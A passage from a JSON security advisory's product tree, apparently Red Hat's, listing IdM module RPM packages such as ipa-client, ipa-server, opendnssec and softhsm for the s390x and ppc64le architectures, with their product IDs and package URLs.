"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=s390x\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product": {
"name": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm (idm:DL1)",
"product_id": "slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product": {
"name": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm (idm:DL1)",
"product_id": "softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=s390x\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm (idm:client)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=ppc64le\u0026rpmmod=idm:client:8100020240417004735:143e9e98"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product": {
"name": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm (idm:DL1)",
"product_id": "ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product": {
"name": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm (idm:DL1)",
"product_id": "opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le\u0026rpmmod=idm:DL1:8100020240416171943:823393f5"
}
}
},
{
